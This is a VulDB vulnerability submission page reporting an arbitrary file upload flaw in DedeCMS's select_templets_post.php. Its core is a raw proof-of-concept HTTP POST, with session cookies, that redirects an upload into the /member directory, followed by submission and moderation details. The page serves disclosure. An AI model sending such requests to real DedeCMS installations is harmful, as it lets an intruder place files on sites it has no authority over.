Submit #206433: dedeCMS has a logic flaw that causes arbitrary file uploads info

Titel dedeCMS has a logic flaw that causes arbitrary file uploads
BeschreibungPOC POST /include/dialog/select_templets_post.php HTTP/1.1 Host: dede.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------59698619541674634093520637807 Content-Length: 821 Origin: http://dede.com Connection: close Referer: http://dede.com/include/dialog/select_templets.php?&activepath=%2Ftemplets%2Fplus&f=form1.templet Cookie: PHPSESSID=7aojpo4e5kuvg8g5jokphrds52; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=1b47eac98453ada5; DedeLoginTime=1693981005; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=3cfe4db1e215919a; _csrf_name_35a8e786=0925065ac6fc01dd9093ec5507d4c2b6; _csrf_name_35a8e7861BH21ANI1AGD297L1FF21LN02BGE1DNG=65437f2a75024ae2 Upgrade-Insecure-Requests: 1 -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="activepath" /member -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="f" form1.templet -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="job" upload -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="uploadfile"; filename="ez_pz.py.txt" Content-Type: text/x-python 1 -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="filename" 123.txt -----------------------------59698619541674634093520637807 Content-Disposition: form-data; name="sb1" 确定 -----------------------------59698619541674634093520637807--
Quelle⚠️ https://github.com/bayuncao/DEDEcms
Benutzer
 bayuncao (UID 50143)
Einreichung11.09.2023 06:45 (vor 3 Jahren)
Moderieren16.09.2023 09:52 (5 days later)
StatusAkzeptiert
VulDB Eintrag239863 [DedeCMS bis 5.7.100 select_templets_post.php activepath erweiterte Rechte]
Punkte20

ZurückÜbersichtWeiter